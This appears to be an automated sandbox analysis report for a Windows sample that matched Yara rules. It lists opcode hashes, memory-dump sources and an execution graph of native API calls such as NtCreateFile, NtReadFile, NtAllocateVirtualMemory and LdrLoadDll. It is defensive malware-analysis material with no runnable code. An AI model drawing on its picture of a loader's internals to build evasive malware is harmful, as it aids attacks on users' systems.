                                                                                                                      • Opcode ID: 6d5287627b5259a3a572ceb0d4550020a2e77d3627bde13f09381768d618d533
                                                                                                                      • Instruction ID: 1ecc93941161eafce04cb07fe60cbd3e014a8d5078064e576d77f047c0750b21
                                                                                                                      • Opcode Fuzzy Hash: 6d5287627b5259a3a572ceb0d4550020a2e77d3627bde13f09381768d618d533
                                                                                                                      • Instruction Fuzzy Hash: 93A18032E002258FCF05DFB6C9445AEB7B2FF85304B96416BE805AB265DB31E94ACF40
                                                                                                                      Function 04BD0006 Relevance: .2, Instructions: 237COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1708223217.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5450f5240eade0fbe89d7c5106ce51ae794365023d26ac9292e2b30b029cb9ea
                                                                                                                      • Instruction ID: 7dce0af153047c404e54175d3dd9f9c29c1bbd09a649e9fa4be980af139593fa
                                                                                                                      • Opcode Fuzzy Hash: 5450f5240eade0fbe89d7c5106ce51ae794365023d26ac9292e2b30b029cb9ea
                                                                                                                      • Instruction Fuzzy Hash: 45C16AB0800745ABD330CF25EA4C6997BB1FB85364F54470BD1616B2E5EBBE188ADF60

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                      Signature Coverage:5.8%
                                                                                                                      Total number of Nodes:556
                                                                                                                      Total number of Limit Nodes:73
                                                                                                                      execution_graph 95589 1102ad0 LdrInitializeThunk 95592 41f080 95595 41b930 95592->95595 95596 41b956 95595->95596 95603 409d30 95596->95603 95598 41b962 95602 41b983 95598->95602 95611 40c1b0 95598->95611 95600 41b975 95647 41a670 95600->95647 95606 409d3d 95603->95606 95650 409c80 95603->95650 95605 409d44 95605->95598 95606->95605 95662 409c20 95606->95662 95612 40c1d5 95611->95612 96081 40b1b0 95612->96081 95614 40c22c 96085 40ae30 95614->96085 95616 40c4a3 95616->95600 95617 40c252 95617->95616 96094 414390 95617->96094 95619 40c297 95619->95616 96097 408a60 95619->96097 95621 40c2db 95621->95616 96104 41a4c0 95621->96104 95625 40c331 95626 40c338 95625->95626 96116 419fd0 95625->96116 95627 41bd80 2 API calls 95626->95627 95629 40c345 95627->95629 95629->95600 95631 40c382 95632 41bd80 2 API calls 95631->95632 95633 40c389 95632->95633 95633->95600 95634 40c392 95635 40f490 3 API calls 95634->95635 95636 40c406 95635->95636 95636->95626 95637 40c411 95636->95637 95638 41bd80 2 API calls 95637->95638 95639 40c435 95638->95639 96121 41a020 95639->96121 95642 419fd0 2 API calls 95643 40c470 95642->95643 95643->95616 96126 419de0 95643->96126 95646 41a670 2 API calls 95646->95616 95648 41a68f ExitProcess 95647->95648 95649 41af20 LdrLoadDll 95647->95649 95649->95648 95681 418b80 95650->95681 95654 409ca6 95654->95606 95655 409c9c 95655->95654 95688 41b270 95655->95688 95657 409ce3 95657->95654 95699 409aa0 95657->95699 95659 409d03 95705 409620 LdrLoadDll 95659->95705 95661 409d15 95661->95606 95663 409c3a 95662->95663 95664 41b560 LdrLoadDll 95662->95664 96056 41b560 95663->96056 95664->95663 95667 41b560 LdrLoadDll 95668 409c61 95667->95668 95669 40f170 95668->95669 95670 40f189 95669->95670 96064 40b030 95670->96064 95672 40f19c 96068 41a1a0 95672->96068 95675 409d55 95675->95598 95677 40f1c2 95678 40f1ed 95677->95678 96074 41a220 95677->96074 95680 41a450 2 API calls 95678->95680 95680->95675 95682 418b8f 95681->95682 95706 414e40 95682->95706 95684 409c93 95685 418a30 95684->95685 95712 41a5c0 95685->95712 95689 41b289 95688->95689 95719 414a40 95689->95719 95691 41b2a1 95692 41b2aa 95691->95692 95758 41b0b0 95691->95758 95692->95657 95694 41b2be 95694->95692 95776 419ec0 95694->95776 96034 407ea0 95699->96034 95701 409aba 95702 409ac1 95701->95702 96047 408160 95701->96047 95702->95659 95705->95661 95707 414e5a 95706->95707 95708 414e4e 95706->95708 95707->95684 95708->95707 95711 4152c0 LdrLoadDll 95708->95711 95710 414fac 95710->95684 95711->95710 95715 41af20 95712->95715 95714 418a45 95714->95655 95716 41af30 95715->95716 95718 41af52 95715->95718 95717 414e40 LdrLoadDll 95716->95717 95717->95718 95718->95714 95720 414d75 95719->95720 95721 414a54 95719->95721 95720->95691 95721->95720 95784 419c10 95721->95784 95724 414b80 95787 41a320 95724->95787 95725 414b63 95844 41a420 LdrLoadDll 95725->95844 95728 414b6d 95728->95691 95729 414ba7 95730 41bd80 2 API calls 95729->95730 95733 414bb3 95730->95733 95731 414d39 95732 41a450 2 API calls 95731->95732 95735 414d40 95732->95735 95733->95728 95733->95731 95734 414d4f 95733->95734 95738 414c42 95733->95738 95853 414780 LdrLoadDll NtReadFile NtClose 95734->95853 95735->95691 95737 414d62 95737->95691 95739 414ca9 95738->95739 95741 414c51 95738->95741 95739->95731 95740 414cbc 95739->95740 95846 41a2a0 95740->95846 95743 414c56 95741->95743 95744 414c6a 95741->95744 95845 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 95743->95845 95745 414c87 95744->95745 95746 414c6f 95744->95746 95745->95735 95802 414400 95745->95802 95790 4146e0 95746->95790 95751 414c60 95751->95691 95752 414c7d 95752->95691 95754 414d1c 95850 41a450 95754->95850 95755 414c9f 95755->95691 95757 414d28 95757->95691 95759 41b0c1 95758->95759 95760 41b0d3 95759->95760 95871 41bd00 95759->95871 95760->95694 95762 41b0f4 95874 414060 95762->95874 95764 41b140 95764->95694 95765 41b117 95765->95764 95766 414060 3 API calls 95765->95766 95767 41b139 95766->95767 95767->95764 95906 415380 95767->95906 95769 41b1da 95916 41ad30 95769->95916 95770 41b1ca 95770->95769 96000 41aec0 LdrLoadDll 95770->96000 95773 41b208 95995 419e80 95773->95995 95777 41af20 LdrLoadDll 95776->95777 95778 419edc 95777->95778 96028 1102c0a 95778->96028 95779 419ef7 95781 41bd80 95779->95781 95782 41b319 95781->95782 96031 41a630 95781->96031 95782->95657 95785 41af20 LdrLoadDll 95784->95785 95786 414b34 95785->95786 95786->95724 95786->95725 95786->95728 95788 41af20 LdrLoadDll 95787->95788 95789 41a33c NtCreateFile 95788->95789 95789->95729 95791 4146fc 95790->95791 95792 41a2a0 LdrLoadDll 95791->95792 95793 41471d 95792->95793 95794 414724 95793->95794 95795 414738 95793->95795 95797 41a450 2 API calls 95794->95797 95796 41a450 2 API calls 95795->95796 95798 414741 95796->95798 95799 41472d 95797->95799 95854 41bf90 LdrLoadDll RtlAllocateHeap 95798->95854 95799->95752 95801 41474c 95801->95752 95803 41444b 95802->95803 95808 41447e 95802->95808 95804 41a2a0 LdrLoadDll 95803->95804 95807 414466 95804->95807 95805 4145c9 95806 41a2a0 LdrLoadDll 95805->95806 95814 4145e4 95806->95814 95809 41a450 2 API calls 95807->95809 95808->95805 95810 41449a 95808->95810 95811 41446f 95809->95811 95812 41a2a0 LdrLoadDll 95810->95812 95811->95755 95813 4144b5 95812->95813 95816 4144d1 95813->95816 95817 4144bc 95813->95817 95867 41a2e0 LdrLoadDll 95814->95867 95820 4144d6 95816->95820 95821 4144ec 95816->95821 95819 41a450 2 API calls 95817->95819 95818 41461e 95822 41a450 2 API calls 95818->95822 95823 4144c5 95819->95823 95824 41a450 2 API calls 95820->95824 95829 4144f1 95821->95829 95855 41bf50 95821->95855 95826 414629 95822->95826 95823->95755 95825 4144df 95824->95825 95825->95755 95826->95755 95837 414503 95829->95837 95858 41a3d0 95829->95858 95830 414557 95831 41456e 95830->95831 95866 41a260 LdrLoadDll 95830->95866 95832 414575 95831->95832 95833 41458a 95831->95833 95835 41a450 2 API calls 95832->95835 95836 41a450 2 API calls 95833->95836 95835->95837 95838 414593 95836->95838 95837->95755 95839 4145bf 95838->95839 95861 41bb50 95838->95861 95839->95755 95841 4145aa 95842 41bd80 2 API calls 95841->95842 95843 4145b3 95842->95843 95843->95755 95844->95728 95845->95751 95847 41af20 LdrLoadDll 95846->95847 95848 414d04 95846->95848 95847->95848 95849 41a2e0 LdrLoadDll 95848->95849 95849->95754 95851 41a46c NtClose 95850->95851 95852 41af20 LdrLoadDll 95850->95852 95851->95757 95852->95851 95853->95737 95854->95801 95868 41a5f0 95855->95868 95857 41bf68 95857->95829 95859 41af20 LdrLoadDll 95858->95859 95860 41a3ec NtReadFile 95859->95860 95860->95830 95862 41bb74 95861->95862 95863 41bb5d 95861->95863 95862->95841 95863->95862 95864 41bf50 2 API calls 95863->95864 95865 41bb8b 95864->95865 95865->95841 95866->95831 95867->95818 95869 41af20 LdrLoadDll 95868->95869 95870 41a60c RtlAllocateHeap 95869->95870 95870->95857 96001 41a500 95871->96001 95873 41bd2d 95873->95762 95875 414071 95874->95875 95877 414079 95874->95877 95875->95765 95876 41434c 95876->95765 95877->95876 96004 41cef0 95877->96004 95879 4140cd 95880 41cef0 2 API calls 95879->95880 95884 4140d8 95880->95884 95881 414126 95883 41cef0 2 API calls 95881->95883 95887 41413a 95883->95887 95884->95881 95885 41d020 3 API calls 95884->95885 96015 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 95884->96015 95885->95884 95886 414197 95888 41cef0 2 API calls 95886->95888 95887->95886 96009 41d020 95887->96009 95889 4141ad 95888->95889 95891 4141ea 95889->95891 95893 41d020 3 API calls 95889->95893 95892 41cef0 2 API calls 95891->95892 95894 4141f5 95892->95894 95893->95889 95895 41d020 3 API calls 95894->95895 95901 41422f 95894->95901 95895->95894 95897 414324 96017 41cf50 LdrLoadDll RtlFreeHeap 95897->96017 95899 41432e 96018 41cf50 LdrLoadDll RtlFreeHeap 95899->96018 96016 41cf50 LdrLoadDll RtlFreeHeap 95901->96016 95902 414338 96019 41cf50 LdrLoadDll RtlFreeHeap 95902->96019 95904 414342 96020 41cf50 LdrLoadDll RtlFreeHeap 95904->96020 95907 415391 95906->95907 95908 414a40 8 API calls 95907->95908 95909 4153a7 95908->95909 95910 4153e2 95909->95910 95911 4153f5 95909->95911 95915 4153fa 95909->95915 95912 41bd80 2 API calls 95910->95912 95913 41bd80 2 API calls 95911->95913 95914 4153e7 95912->95914 95913->95915 95914->95770 95915->95770 96021 41abf0 95916->96021 95919 41abf0 LdrLoadDll 95920 41ad4d 95919->95920 95921 41abf0 LdrLoadDll 95920->95921 95922 41ad56 95921->95922 95923 41abf0 LdrLoadDll 95922->95923 95924 41ad5f 95923->95924 95925 41abf0 LdrLoadDll 95924->95925 95926 41ad68 95925->95926 95927 41abf0 LdrLoadDll 95926->95927 95928 41ad71 95927->95928 95929 41abf0 LdrLoadDll 95928->95929 95930 41ad7d 95929->95930 95931 41abf0 LdrLoadDll 95930->95931 95932 41ad86 95931->95932 95933 41abf0 LdrLoadDll 95932->95933 95934 41ad8f 95933->95934 95935 41abf0 LdrLoadDll 95934->95935 95936 41ad98 95935->95936 95937 41abf0 LdrLoadDll 95936->95937 95938 41ada1 95937->95938 95939 41abf0 LdrLoadDll 95938->95939 95940 41adaa 95939->95940 95941 41abf0 LdrLoadDll 95940->95941 95942 41adb6 95941->95942 95943 41abf0 LdrLoadDll 95942->95943 95944 41adbf 95943->95944 95945 41abf0 LdrLoadDll 95944->95945 95946 41adc8 95945->95946 95947 41abf0 LdrLoadDll 95946->95947 95948 41add1 95947->95948 95949 41abf0 LdrLoadDll 95948->95949 95950 41adda 95949->95950 95951 41abf0 LdrLoadDll 95950->95951 95952 41ade3 95951->95952 95953 41abf0 LdrLoadDll 95952->95953 95954 41adef 95953->95954 95955 41abf0 LdrLoadDll 95954->95955 95956 41adf8 95955->95956 95957 41abf0 LdrLoadDll 95956->95957 95958 41ae01 95957->95958 95959 41abf0 LdrLoadDll 95958->95959 95960 41ae0a 95959->95960 95961 41abf0 LdrLoadDll 95960->95961 95962 41ae13 95961->95962 95963 41abf0 LdrLoadDll 95962->95963 95964 41ae1c 95963->95964 95965 41abf0 LdrLoadDll 95964->95965 95966 41ae28 95965->95966 95967 41abf0 LdrLoadDll 95966->95967 95968 41ae31 95967->95968 95969 41abf0 LdrLoadDll 95968->95969 95970 41ae3a 95969->95970 95971 41abf0 LdrLoadDll 95970->95971 95972 41ae43 95971->95972 95973 41abf0 LdrLoadDll 95972->95973 95974 41ae4c 95973->95974 95975 41abf0 LdrLoadDll 95974->95975 95976 41ae55 95975->95976 95977 41abf0 LdrLoadDll 95976->95977 95978 41ae61 95977->95978 95979 41abf0 LdrLoadDll 95978->95979 95980 41ae6a 95979->95980 95981 41abf0 LdrLoadDll 95980->95981 95982 41ae73 95981->95982 95983 41abf0 LdrLoadDll 95982->95983 95984 41ae7c 95983->95984 95985 41abf0 LdrLoadDll 95984->95985 95986 41ae85 95985->95986 95987 41abf0 LdrLoadDll 95986->95987 95988 41ae8e 95987->95988 95989 41abf0 LdrLoadDll 95988->95989 95990 41ae9a 95989->95990 95991 41abf0 LdrLoadDll 95990->95991 95992 41aea3 95991->95992 95993 41abf0 LdrLoadDll 95992->95993 95994 41aeac 95993->95994 95994->95773 95996 41af20 LdrLoadDll 95995->95996 95997 419e9c 95996->95997 96027 1102df0 LdrInitializeThunk 95997->96027 95998 419eb3 95998->95694 96000->95769 96002 41a51c NtAllocateVirtualMemory 96001->96002 96003 41af20 LdrLoadDll 96001->96003 96002->95873 96003->96002 96005 41cf00 96004->96005 96006 41cf06 96004->96006 96005->95879 96007 41bf50 2 API calls 96006->96007 96008 41cf2c 96007->96008 96008->95879 96010 41cf90 96009->96010 96011 41bf50 2 API calls 96010->96011 96012 41cfed 96010->96012 96013 41cfca 96011->96013 96012->95887 96014 41bd80 2 API calls 96013->96014 96014->96012 96015->95884 96016->95897 96017->95899 96018->95902 96019->95904 96020->95876 96022 41ac0b 96021->96022 96023 414e40 LdrLoadDll 96022->96023 96024 41ac2b 96023->96024 96025 414e40 LdrLoadDll 96024->96025 96026 41acd7 96024->96026 96025->96026 96026->95919 96027->95998 96029 1102c11 96028->96029 96030 1102c1f LdrInitializeThunk 96028->96030 96029->95779 96030->95779 96032 41af20 LdrLoadDll 96031->96032 96033 41a64c RtlFreeHeap 96032->96033 96033->95782 96035 407eb0 96034->96035 96036 407eab 96034->96036 96037 41bd00 2 API calls 96035->96037 96036->95701 96040 407ed5 96037->96040 96038 407f38 96038->95701 96039 419e80 2 API calls 96039->96040 96040->96038 96040->96039 96041 407f3e 96040->96041 96045 41bd00 2 API calls 96040->96045 96050 41a580 96040->96050 96043 407f64 96041->96043 96044 41a580 2 API calls 96041->96044 96043->95701 96046 407f55 96044->96046 96045->96040 96046->95701 96048 41a580 2 API calls 96047->96048 96049 40817e 96048->96049 96049->95659 96051 41a59c 96050->96051 96052 41af20 LdrLoadDll 96050->96052 96055 1102c70 LdrInitializeThunk 96051->96055 96052->96051 96053 41a5b3 96053->96040 96055->96053 96057 41b583 96056->96057 96060 40ace0 96057->96060 96061 40ad04 96060->96061 96062 40ad40 LdrLoadDll 96061->96062 96063 409c4b 96061->96063 96062->96063 96063->95667 96065 40b053 96064->96065 96065->96065 96067 40b0d0 96065->96067 96079 419c50 LdrLoadDll 96065->96079 96067->95672 96069 41af20 LdrLoadDll 96068->96069 96070 40f1ab 96069->96070 96070->95675 96071 41a790 96070->96071 96072 41a7af LookupPrivilegeValueW 96071->96072 96073 41af20 LdrLoadDll 96071->96073 96072->95677 96073->96072 96075 41a23c 96074->96075 96076 41af20 LdrLoadDll 96074->96076 96080 1102ea0 LdrInitializeThunk 96075->96080 96076->96075 96077 41a25b 96077->95678 96079->96067 96080->96077 96082 40b1b9 96081->96082 96083 40b030 LdrLoadDll 96082->96083 96084 40b1f4 96083->96084 96084->95614 96086 40ae41 96085->96086 96087 40ae3d 96085->96087 96088 40ae5a 96086->96088 96089 40ae8c 96086->96089 96087->95617 96131 419c90 LdrLoadDll 96088->96131 96132 419c90 LdrLoadDll 96089->96132 96091 40ae9d 96091->95617 96093 40ae7c 96093->95617 96095 40f490 3 API calls 96094->96095 96096 4143b6 96095->96096 96096->95619 96098 408a79 96097->96098 96133 4087a0 96097->96133 96100 408a9d 96098->96100 96101 4087a0 19 API calls 96098->96101 96100->95621 96102 408a8a 96101->96102 96102->96100 96151 40f700 10 API calls 96102->96151 96105 41af20 LdrLoadDll 96104->96105 96106 41a4dc 96105->96106 96271 1102e80 LdrInitializeThunk 96106->96271 96107 40c312 96109 40f490 96107->96109 96110 40f4ad 96109->96110 96272 419f80 96110->96272 96112 40f4f5 96112->95625 96114 419fd0 2 API calls 96115 40f51e 96114->96115 96115->95625 96117 419fec 96116->96117 96118 41af20 LdrLoadDll 96116->96118 96278 1102d10 LdrInitializeThunk 96117->96278 96118->96117 96119 40c375 96119->95631 96119->95634 96122 41af20 LdrLoadDll 96121->96122 96123 41a03c 96122->96123 96279 1102d30 LdrInitializeThunk 96123->96279 96124 40c449 96124->95642 96127 41af20 LdrLoadDll 96126->96127 96128 419dfc 96127->96128 96280 1102fb0 LdrInitializeThunk 96128->96280 96129 40c49c 96129->95646 96131->96093 96132->96091 96134 407ea0 4 API calls 96133->96134 96146 4087ba 96133->96146 96134->96146 96135 408a49 96135->96098 96136 408a3f 96137 408160 2 API calls 96136->96137 96137->96135 96140 419ec0 2 API calls 96140->96146 96144 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 96144->96146 96146->96135 96146->96136 96146->96140 96146->96144 96148 419de0 2 API calls 96146->96148 96149 41a450 LdrLoadDll NtClose 96146->96149 96152 419cd0 96146->96152 96156 4085d0 96146->96156 96168 40f5e0 LdrLoadDll NtClose 96146->96168 96169 419d50 LdrLoadDll 96146->96169 96170 419d80 LdrLoadDll 96146->96170 96171 419e10 LdrLoadDll 96146->96171 96172 4083a0 96146->96172 96188 405f60 LdrLoadDll 96146->96188 96148->96146 96149->96146 96151->96100 96153 419cdf 96152->96153 96154 41af20 LdrLoadDll 96153->96154 96155 419cec 96154->96155 96155->96146 96157 4085e6 96156->96157 96189 419840 96157->96189 96159 4085ff 96164 408771 96159->96164 96210 4081a0 96159->96210 96161 4086e5 96162 4083a0 11 API calls 96161->96162 96161->96164 96163 408713 96162->96163 96163->96164 96165 419ec0 2 API calls 96163->96165 96164->96146 96166 408748 96165->96166 96166->96164 96167 41a4c0 2 API calls 96166->96167 96167->96164 96168->96146 96169->96146 96170->96146 96171->96146 96173 4083c9 96172->96173 96250 408310 96173->96250 96176 41a4c0 2 API calls 96177 4083dc 96176->96177 96177->96176 96178 408467 96177->96178 96180 408462 96177->96180 96258 40f660 96177->96258 96178->96146 96179 41a450 2 API calls 96181 40849a 96179->96181 96180->96179 96181->96178 96182 419cd0 LdrLoadDll 96181->96182 96183 4084ff 96182->96183 96183->96178 96262 419d10 96183->96262 96185 408563 96185->96178 96186 414a40 8 API calls 96185->96186 96187 4085b8 96186->96187 96187->96146 96188->96146 96190 41bf50 2 API calls 96189->96190 96191 419857 96190->96191 96217 409310 96191->96217 96193 419872 96194 4198b0 96193->96194 96195 419899 96193->96195 96198 41bd00 2 API calls 96194->96198 96196 41bd80 2 API calls 96195->96196 96197 4198a6 96196->96197 96197->96159 96199 4198ea 96198->96199 96200 41bd00 2 API calls 96199->96200 96201 419903 96200->96201 96207 419ba4 96201->96207 96223 41bd40 96201->96223 96204 419b90 96205 41bd80 2 API calls 96204->96205 96206 419b9a 96205->96206 96206->96159 96208 41bd80 2 API calls 96207->96208 96209 419bf9 96208->96209 96209->96159 96211 40829f 96210->96211 96212 4081b5 96210->96212 96211->96161 96212->96211 96213 414a40 8 API calls 96212->96213 96214 408222 96213->96214 96215 41bd80 2 API calls 96214->96215 96216 408249 96214->96216 96215->96216 96216->96161 96218 409335 96217->96218 96219 40ace0 LdrLoadDll 96218->96219 96220 409368 96219->96220 96222 40938d 96220->96222 96226 40cf10 96220->96226 96222->96193 96244 41a540 96223->96244 96227 40cf3c 96226->96227 96228 41a1a0 LdrLoadDll 96227->96228 96229 40cf55 96228->96229 96230 40cf5c 96229->96230 96237 41a1e0 96229->96237 96230->96222 96234 40cf97 96235 41a450 2 API calls 96234->96235 96236 40cfba 96235->96236 96236->96222 96238 41a1fc 96237->96238 96239 41af20 LdrLoadDll 96237->96239 96243 1102ca0 LdrInitializeThunk 96238->96243 96239->96238 96240 40cf7f 96240->96230 96242 41a7d0 LdrLoadDll 96240->96242 96242->96234 96243->96240 96245 41af20 LdrLoadDll 96244->96245 96246 41a55c 96245->96246 96249 1102f90 LdrInitializeThunk 96246->96249 96247 419b89 96247->96204 96247->96207 96249->96247 96251 408328 96250->96251 96252 408343 96251->96252 96253 40ace0 LdrLoadDll 96251->96253 96254 414e40 LdrLoadDll 96252->96254 96253->96252 96255 408353 96254->96255 96256 40835c PostThreadMessageW 96255->96256 96257 408370 96255->96257 96256->96257 96257->96177 96259 40f673 96258->96259 96265 419e50 96259->96265 96263 419d2c 96262->96263 96264 41af20 LdrLoadDll 96262->96264 96263->96185 96264->96263 96266 419e6c 96265->96266 96267 41af20 LdrLoadDll 96265->96267 96270 1102dd0 LdrInitializeThunk 96266->96270 96267->96266 96268 40f69e 96268->96177 96270->96268 96271->96107 96273 419f9c 96272->96273 96274 41af20 LdrLoadDll 96272->96274 96277 1102f30 LdrInitializeThunk 96273->96277 96274->96273 96275 40f4ee 96275->96112 96275->96114 96277->96275 96278->96119 96279->96124 96280->96129

                                                                                                                      Executed Functions

                                                                                                                      Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 41a3d0-41a419 call 41af20 NtReadFile
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID: !JA$bMA$bMA
                                                                                                                      • API String ID: 2738559852-4222312340
                                                                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                      • Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
                                                                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                      • Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                                                                                      Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 268 40ace0-40acfc 269 40ad04-40ad09 268->269 270 40acff call 41cc10 268->270 271 40ad0b-40ad0e 269->271 272 40ad0f-40ad1d call 41d030 269->272 270->269 275 40ad2d-40ad3e call 41b460 272->275 276 40ad1f-40ad2a call 41d2b0 272->276 281 40ad40-40ad54 LdrLoadDll 275->281 282 40ad57-40ad5a 275->282 276->275 281->282
                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                      • Instruction ID: 93036d1b31c8ba6342ae8de3f2893f5930aff37f33252288d1eb8296453bc5b5
                                                                                                                      • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                      • Instruction Fuzzy Hash: FF015EB5E0020DABDB10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                                                                                      Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 283 41a320-41a371 call 41af20 NtCreateFile
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                      • Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
                                                                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                      • Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                      Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 286 41a500-41a516 287 41a51c-41a53d NtAllocateVirtualMemory 286->287 288 41a517 call 41af20 286->288 288->287
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                      • Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
                                                                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                      • Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                      Function 0041A4FB Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 289 41a4fb-41a53d call 41af20 NtAllocateVirtualMemory
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
                                                                                                                      • Instruction ID: 94507bbf397dcc5c3ac71cc5815c082cb0521fc5d078fd0b1a8f82b8904cbc8a
                                                                                                                      • Opcode Fuzzy Hash: aaf07d7c655785086d8b5f0a451b4062681b2a67c108c2b33990bb495246c866
                                                                                                                      • Instruction Fuzzy Hash: 48F030B62001496BCB15DF98DC85CA777A9BF88214B15865EFD489B203C634D865CBA0
                                                                                                                      Function 0041A44B Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
